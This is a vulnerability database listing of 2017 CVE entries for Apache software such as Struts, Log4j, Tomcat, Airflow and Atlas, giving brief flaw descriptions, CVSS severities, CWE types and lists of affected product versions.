The YARN NodeManager in Apache Hadoop 2.7.3 and 2.7.4 can leak the password for credential store provider used by the NodeManager to YARN Applications.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hadoop 2.7.4
apache hadoop 2.7.3
CVE-2017-15720 MEDIUM

In Apache Airflow 1.8.2 and earlier, an authenticated user can execute code remotely on the Airflow webserver by creating a special object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache airflow *
CVE-2017-17835 MEDIUM

In Apache Airflow 1.8.2 and earlier, a CSRF vulnerability allowed for a remote command injection on a default install of Airflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache airflow *
CVE-2017-17836 MEDIUM

In Apache Airflow 1.8.2 and earlier, an experimental Airflow feature displayed authenticated cookies, as well as passwords to databases used by Airflow. An attacker who has limited access to airflow, whether it be via XSS or by leaving a machine unlocked can exfiltrate all credentials from the system.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache airflow *
CVE-2017-17837 MEDIUM

The Apache DeltaSpike-JSF 1.8.0 module has an XSS injection leak in the windowId handling. The default size of the windowId gets cut off after 10 characters (by default), so the impact might be limited. A fix was applied and released in Apache deltaspike-1.8.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache deltaspike 1.8.0
CVE-2017-3150 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating use cookies that could be accessible to client-side script.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3151 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to Stored Cross-Site Scripting in the edit-tag functionality.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3152 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to DOM XSS in the edit-tag functionality.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3153 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to Reflected XSS in the search functionality.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3154 MEDIUM

Error responses from Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating included stack trace, exposing excessive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3155 MEDIUM

Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to cross frame scripting.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2017-3156 MEDIUM

The OAuth2 Hawk and JOSE MAC Validation code in Apache CXF prior to 3.0.13 and 3.1.x prior to 3.1.10 is not using a constant time MAC signature comparison algorithm which may be exploited by sophisticated timing attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cxf 3.1.3
apache cxf 3.1.0
apache cxf 3.1.9
apache cxf *
apache cxf 3.1.4
apache cxf 3.1.8
apache cxf 3.1.5
apache cxf 3.1.6
apache cxf 3.1.2
apache cxf 3.1.1
apache cxf 3.1.7
CVE-2017-3157 MEDIUM

By exploiting the way Apache OpenOffice before 4.1.4 renders embedded objects, an attacker could craft a document that allows reading in a file from the user's filesystem. Information could be retrieved by the attacker by, e.g., using hidden sections to store the information, tricking the user into saving the document and convincing the user to send the document back to the attacker. The vulnerability is mitigated by the need for the attacker to know the precise file path in the target system, and the need to trick the user into saving the document and sending it back.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_eus 7.4
apache openoffice *
debian debian_linux 9.0
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_server_eus 7.5
redhat enterprise_linux_server_eus 7.3
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_eus 7.6
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2017-3158 MEDIUM

A race condition in Guacamole's terminal emulator in versions 0.9.5 through 0.9.10-incubating could allow writes of blocks of printed data to overlap. Such overlapping writes could cause packet data to be misread as the packet length, resulting in the remaining data being written beyond the end of a statically-allocated buffer.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache guacamole *
apache guacamole 0.9.10-incubating
CVE-2017-3159 HIGH

Apache Camel's camel-snakeyaml component is vulnerable to Java object de-serialization vulnerability. De-serializing untrusted data can lead to security flaws.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache camel *
CVE-2017-3160 MEDIUM

After the Android platform is added to Cordova the first time, or after a project is created using the build scripts, the scripts will fetch Gradle on the first build. However, since the default URI is not using https, it is vulnerable to a MiTM and the Gradle executable is not safe. The severity of this issue is high due to the fact that the build scripts immediately start a build after Gradle has been fetched. Developers who are concerned about this issue should install version 6.1.2 or higher of Cordova-Android. If developers are unable to install the latest version, this vulnerability can easily be mitigated by setting the CORDOVA_ANDROID_GRADLE_DISTRIBUTION_URL environment variable to https://services.gradle.org/distributions/gradle-2.14.1-all.zip

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cordova *
CVE-2017-3161 MEDIUM

The HDFS web UI in Apache Hadoop before 2.7.0 is vulnerable to a cross-site scripting (XSS) attack through an unescaped query parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2017-3162 HIGH

HDFS clients interact with a servlet on the DataNode to browse the HDFS namespace. The NameNode is provided as a query parameter that is not validated in Apache Hadoop before 2.7.0.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2017-3163 MEDIUM

When using the Index Replication feature, Apache Solr nodes can pull index files from a master/leader node using an HTTP API which accepts a file name. However, Solr before 5.5.4 and 6.x before 6.4.1 did not validate the file name, hence it was possible to craft a special request involving path traversal, leaving any file readable to the Solr server process exposed. Solr servers protected and restricted by firewall rules and/or authentication would not be at risk since only trusted clients and users would gain direct HTTP access.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache solr 6.4.0
apache solr 6.2.0
apache solr 6.2.1
apache solr 6.0.0
apache solr 6.3.0
apache solr 6.0.1
apache solr 6.1.0
apache solr *
CVE-2017-3164 MEDIUM

Server Side Request Forgery in Apache Solr, versions 1.3 until 7.6 (inclusive). Since the "shards" parameter does not have a corresponding whitelist mechanism, a remote attacker with access to the server could make Solr perform an HTTP GET request to any reachable URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache solr *
CVE-2017-3165 LOW

In Apache Brooklyn before 0.10.0, the REST server is vulnerable to cross-site scripting where one authenticated user can cause scripts to run in the browser of another user authorized to access the first user's resources. This is due to improper escaping of server-side content. There is known to be a proof-of-concept exploit using this vulnerability.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache brooklyn *
CVE-2017-3166 MEDIUM

In Apache Hadoop versions 2.6.1 to 2.6.5, 2.7.0 to 2.7.3, and 3.0.0-alpha1, if a file in an encryption zone with access permissions that make it world readable is localized via YARN's localization mechanism, that file will be stored in a world-readable location and can be shared freely with any application that requests to localize that file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache hadoop 2.6.2
apache hadoop 2.6.4
apache hadoop 2.7.1
apache hadoop 2.7.0
apache hadoop 2.6.3
apache hadoop 2.6.5
apache hadoop 2.7.2
apache hadoop 2.6.1
apache hadoop 2.7.3
apache hadoop 3.0.0
CVE-2017-3167 HIGH

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, use of the ap_get_basic_auth_pw() by third-party modules outside of the authentication phase may lead to authentication requirements being bypassed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
apache http_server *
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat jboss_core_services 1.0
redhat enterprise_linux_eus 7.6
netapp clustered_data_ontap -
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.2
netapp storagegrid -
oracle secure_global_desktop 5.3
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
apple mac_os_x *
netapp oncommand_unified_manager -
debian debian_linux 9.0
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_eus 6.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 7.0
CVE-2017-3169 HIGH

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_ssl may dereference a NULL pointer when third-party modules call ap_hook_process_connection() during an HTTP request to an HTTPS port.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server 2.2.17
apache http_server 2.2.27
apache http_server 2.2.31
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.11
apache http_server 2.4.18
apache http_server 2.2.2
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.2.14
apache http_server 2.4.17
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.25
apache http_server 2.2.26
apache http_server 2.2.12
apache http_server 2.2.29
apache http_server 2.4.25
apache http_server 2.2.23
apache http_server 2.2.32
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.4.23
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.16
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.22
apache http_server 2.2.3
apache http_server 2.2.30
apache http_server 2.2.24
CVE-2017-5635 MEDIUM

In Apache NiFi before 0.7.2 and 1.x before 1.1.2 in a cluster environment, if an anonymous user request is replicated to another node, the originating node identity is used rather than the "anonymous" user.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache nifi 0.7.0
apache nifi 1.1.1
apache nifi 1.1.0
apache nifi 0.7.1
CVE-2017-5636 HIGH

In Apache NiFi before 0.7.2 and 1.x before 1.1.2 in a cluster environment, the proxy chain serialization/deserialization is vulnerable to an injection attack where a carefully crafted username could impersonate another user and gain their permissions on a replicated request to another node.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache nifi 0.7.0
apache nifi 1.1.1
apache nifi 1.1.0
apache nifi 0.7.1
CVE-2017-5637 MEDIUM

Two four letter word commands, "wchp/wchc", are CPU intensive and could cause a spike in CPU utilization on an Apache ZooKeeper server if abused, which leaves the server unable to serve legitimate client requests. Apache ZooKeeper through version 3.4.9 and 3.5.2 suffer from this issue, fixed in 3.4.10, 3.5.3, and later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,CWE-400,

Products Affected

Vendor Product Version
apache zookeeper 3.5.1
apache zookeeper 3.4.2
apache zookeeper 3.4.6
apache zookeeper 3.4.3
apache zookeeper 3.4.5
apache zookeeper 3.5.2
debian debian_linux 8.0
apache zookeeper 3.4.7
apache zookeeper 3.5.0
apache zookeeper 3.4.1
apache zookeeper 3.4.4
apache zookeeper 3.4.0
apache zookeeper 3.4.9
apache zookeeper 3.4.8
CVE-2017-5638 HIGH

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-755,

Products Affected

Vendor Product Version
apache struts 2.3.20
oracle weblogic_server 10.3.6.0.0
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.5.4
oracle weblogic_server 12.2.1.1.0
lenovo storage_v5030_firmware 7.7.1.6
apache struts 2.3.28.1
hp server_automation 9.1.0
apache struts 2.3.25
ibm storwize_v5000_firmware 7.7.1.6
apache struts 2.5.10
apache struts *
apache struts 2.3.15.2
ibm storwize_v5000_firmware 7.8.1.0
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.5.6
ibm storwize_v3500_firmware 7.7.1.6
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.3.27
apache struts 2.3.15.1
apache struts 2.3.23
ibm storwize_v7000_firmware 7.8.1.0
apache struts 2.3.13
apache struts 2.5.7
ibm storwize_v7000_firmware 7.7.1.6
apache struts 2.5
arubanetworks clearpass_policy_manager *
netapp oncommand_balance -
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
ibm storwize_v3500_firmware 7.8.1.0
lenovo storage_v5030_firmware 7.8.1.0
hp server_automation 10.2.0
apache struts 2.3.24.2
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.6
oracle weblogic_server 12.2.1.2.0
hp server_automation 10.0.0
apache struts 2.3.12
hp server_automation 10.1.0
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.3.9
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.3.5
apache struts 2.3.24.1
hp server_automation 10.5.0
apache struts 2.3.21
apache struts 2.3.20.2
oracle weblogic_server 12.1.3.0.0
apache struts 2.3.16
CVE-2017-5640 HIGH

It was noticed that a malicious process impersonating an Impala daemon in Apache Impala (incubating) 2.7.0 to 2.8.0 could cause Impala daemons to skip authentication checks when Kerberos is enabled (but TLS is not). If the malicious server responds with 'COMPLETE' before the SASL handshake has completed, the client will consider the handshake as completed even though no exchange of credentials has happened.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache impala 2.8.0
apache impala 2.7.0
CVE-2017-5641 HIGH

Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache flex_blazeds *
hp xp_command_view_advanced_edition *
CVE-2017-5642 HIGH

During installation of Ambari 2.4.0 through 2.4.2, Ambari Server artifacts are not created with proper ACLs.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-276,

Products Affected

Vendor Product Version
apache ambari 2.4.0
apache ambari 2.4.1
apache ambari 2.4.2
CVE-2017-5643 MEDIUM

Apache Camel's Validation Component is vulnerable against SSRF via remote DTDs and XXE.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache camel 2.17.1
apache camel 2.17.3
apache camel 2.18.0
apache camel 2.17.5
apache camel 2.18.1
apache camel *
apache camel 2.17.2
apache camel 2.17.0
apache camel 2.18.2
apache camel 2.17.4
CVE-2017-5644 HIGH

Apache POI in versions prior to release 3.15 allows remote attackers to cause a denial of service (CPU consumption) via a specially crafted OOXML file, aka an XML Entity Expansion (XEE) attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-776,

Products Affected

Vendor Product Version
apache poi *
CVE-2017-5645 HIGH

In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle financial_services_hedge_management_and_ifrs_valuations 8.0.5
redhat enterprise_linux_server_aus 7.4
oracle siebel_ui_framework 18.7
oracle financial_services_regulatory_reporting_with_agilereporter 8.0.9.2.0
oracle policy_automation 12.2.0
oracle policy_automation 12.2.7
oracle soa_suite 12.2.2.0.0
oracle api_gateway 11.1.2.4.0
oracle identity_management_suite 11.1.2.3.0
oracle weblogic_server 10.3.6.0.0
oracle retail_extract_transform_and_load 13.2
oracle financial_services_profitability_management 6.1.1
redhat enterprise_linux 7.3
oracle policy_automation 12.2.9
redhat enterprise_linux 6.0
oracle retail_extract_transform_and_load 13.1
oracle insurance_rules_palette 11.1
oracle policy_automation 10.4.7
oracle financial_services_loan_loss_forecasting_and_provisioning 8.0.5
oracle policy_automation_for_mobile_devices 12.2.9
oracle insurance_policy_administration 10.1
oracle weblogic_server 12.2.1.3.0
oracle bi_publisher 12.2.1.4.0
oracle insurance_policy_administration 10.0
oracle siebel_ui_framework 18.8
oracle identity_management_suite 12.2.1.3.0
redhat enterprise_linux_server_eus 7.4
oracle retail_open_commerce_platform 6.0.1
oracle enterprise_manager_for_oracle_database 13.2.2
netapp snapcenter -
oracle retail_integration_bus 14.0.0
oracle insurance_rules_palette 10.1
oracle jdeveloper 11.1.1.9.0
oracle enterprise_manager_for_mysql_database *
oracle policy_automation 12.2.10
oracle policy_automation_for_mobile_devices 12.1.0
oracle retail_advanced_inventory_planning 14.0
oracle weblogic_server 14.1.1.0.0
oracle financial_services_hedge_management_and_ifrs_valuations 8.0.4
oracle endeca_information_discovery_studio 3.2.0
oracle retail_service_backbone 16.0
oracle banking_platform 2.6.2
oracle tape_library_acsls 8.4
redhat enterprise_linux_server 7.0
oracle retail_integration_bus 16.0
oracle instantis_enterprisetrack *
oracle financial_services_loan_loss_forecasting_and_provisioning 8.0.4
redhat enterprise_linux_server_tus 7.6
netapp service_level_manager -
oracle communications_webrtc_session_controller *
oracle banking_platform 2.6.0
apache log4j *
oracle policy_automation_for_mobile_devices 12.2.8
oracle communications_service_broker 6.0
redhat enterprise_linux 7.4
oracle peoplesoft_enterprise_fin_install 9.2
netapp oncommand_insight -
redhat fuse 1.0
oracle communications_network_integrity *
oracle utilities_advanced_spatial_and_operational_analytics 2.7.0.1
redhat enterprise_linux_server_aus 7.6
oracle jdeveloper 12.2.1.3.0
oracle policy_automation_for_mobile_devices 12.2.6
oracle bi_publisher 11.1.1.9.0
oracle enterprise_manager_for_oracle_database 12.1.0.8
oracle retail_clearance_optimization_engine 14.0.5
oracle financial_services_lending_and_leasing 12.5.0
oracle retail_predictive_application_server 15.0.3
oracle retail_open_commerce_platform 6.0.0
oracle autovue_vuelink_integration 21.0.0
oracle fusion_middleware_mapviewer 12.2.1.2
oracle retail_service_backbone 14.1
oracle retail_extract_transform_and_load 19.0
oracle communications_messaging_server *
oracle goldengate_application_adapters 12.3.2.1.1
oracle policy_automation_for_mobile_devices 10.4.7
oracle jd_edwards_enterpriseone_tools 9.2
oracle insurance_calculation_engine 10.2.1
redhat enterprise_linux 7.6
oracle policy_automation_for_mobile_devices 12.2.5
oracle rapid_planning 12.2
oracle soa_suite 12.1.3.0.0
oracle communications_online_mediation_controller 6.1
oracle policy_automation_for_mobile_devices 12.2.2
oracle configuration_manager 12.1.2.0.5
oracle financial_services_behavior_detection_platform *
oracle policy_automation_connector_for_siebel 10.4.6
oracle policy_automation_for_mobile_devices 12.2.0
oracle flexcube_investor_servicing 12.3.0
oracle primavera_gateway *
oracle flexcube_investor_servicing 12.4.0
oracle policy_automation 12.1.1
oracle enterprise_manager_for_peoplesoft 13.1.1.1
oracle jd_edwards_enterpriseone_tools 4.0.1.0
oracle in-memory_performance-driven_planning 12.2
oracle policy_automation 12.2.8
oracle policy_automation 12.2.3
redhat enterprise_linux_server_tus 7.4
oracle timesten_in-memory_database 11.2.2.8.49
netapp oncommand_api_services -
oracle insurance_rules_palette 10.2
oracle banking_platform 2.6.1
oracle enterprise_manager_for_fusion_middleware 12.1.0.5
oracle retail_extract_transform_and_load 13.0
oracle policy_automation 12.1.0
oracle identity_analytics 11.1.1.5.8
oracle policy_automation 12.2.5
oracle soa_suite 12.2.1.3.0
oracle communications_interactive_session_recorder *
oracle fusion_middleware_mapviewer 12.2.1.3
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
oracle application_testing_suite 13.3.0.1
oracle bi_publisher 12.2.1.3.0
oracle policy_automation_for_mobile_devices 12.2.3
oracle retail_advanced_inventory_planning 15.0
oracle identity_manager_connector 9.0
oracle policy_automation_for_mobile_devices 12.2.10
oracle insurance_rules_palette 10.0
oracle enterprise_manager_base_platform 13.2.0.0
redhat enterprise_linux_server_eus 7.6
oracle flexcube_investor_servicing 14.0.0
oracle insurance_rules_palette 11.0
oracle enterprise_manager_base_platform 12.1.0.5
oracle goldengate 12.3.2.1.1
oracle policy_automation 12.2.1
oracle enterprise_data_quality 12.2.1.3.0
oracle in-memory_performance-driven_planning 12.1
oracle insurance_policy_administration 11.0
netapp storage_automation_store -
oracle autovue_vuelink_integration 21.0.1
oracle financial_services_analytical_applications_infrastructure *
oracle siebel_ui_framework 18.9
oracle policy_automation 12.2.2
oracle policy_automation 12.2.6
oracle retail_open_commerce_platform 5.3.0
oracle retail_integration_bus 14.1.0
oracle retail_service_backbone 15.0
oracle rapid_planning 12.1
oracle policy_automation_for_mobile_devices 12.2.1
oracle insurance_policy_administration 10.2
oracle policy_automation 12.2.4
oracle mysql_enterprise_monitor *
oracle flexcube_investor_servicing 12.0.4
redhat enterprise_linux_desktop 7.0
oracle jdeveloper 12.1.3.0.0
oracle weblogic_server 12.2.1.4.0
oracle configuration_manager 12.1.2.0.2
oracle communications_pricing_design_center 12.0
oracle financial_services_behavior_detection_platform 6.1.1
redhat enterprise_linux_workstation 7.0
oracle policy_automation_for_mobile_devices 12.1.1
oracle financial_services_lending_and_leasing *
redhat enterprise_linux 6.7
redhat enterprise_linux_server_eus 7.5
oracle policy_automation_for_mobile_devices 12.2.4
oracle flexcube_investor_servicing 12.1.0
oracle communications_instant_messaging_server 10.0.1.3.0
oracle policy_automation_for_mobile_devices 12.2.7
oracle retail_integration_bus 15.0
oracle financial_services_profitability_management *
oracle insurance_calculation_engine 10.1.1
oracle utilities_work_and_asset_management 1.9.1.2.12
oracle communications_pricing_design_center 11.1
oracle enterprise_manager_for_fusion_middleware 13.2.0.0
oracle communications_converged_application_server_-_service_controller 6.1
oracle enterprise_manager_for_peoplesoft 13.2.1.1
oracle bi_publisher 11.1.1.7.0
netapp oncommand_workflow_automation -
oracle weblogic_server 12.1.3.0.0
CVE-2017-5646 MEDIUM

For versions of Apache Knox from 0.2.0 to 0.11.0, an authenticated user may use a specially crafted URL to impersonate another user while accessing WebHDFS through Apache Knox. This may result in escalated privileges and unauthorized data access. While this activity is audit logged and can be easily associated with the authenticated user, this is still a serious security issue. All users are recommended to upgrade to the Apache Knox 0.12.0 release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.6 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-346,

Products Affected

Vendor Product Version
apache knox 0.4.0
apache knox 0.2.0
apache knox 0.7.0
apache knox 0.10.0
apache knox 0.6.0
apache knox 0.8.0
apache knox 0.3.0
apache knox 0.5.0
apache knox 0.9.0
apache knox 0.11.0
CVE-2017-5647 MEDIUM

A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.0.42
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.72
apache tomcat 6.0.50
apache tomcat 9.0.0
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 8.0.40
apache tomcat 8.5.4
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 8.5.11
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 6.0.42
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 6.0.34
apache tomcat 7.0.24
apache tomcat 8.5.7
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 8.0.32
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 6.0.52
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 6.0.24
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 6.0.51
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 6.0.7
apache tomcat 6.0.46
apache tomcat 6.0.1
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.38
apache tomcat 8.0.37
apache tomcat 6.0.8
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 6.0.44
apache tomcat 6.0.15
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.17
apache tomcat 6.0.22
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.23
apache tomcat 7.0.75
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 6.0.17
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 6.0.45
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 6.0.47
apache tomcat 6.0.25
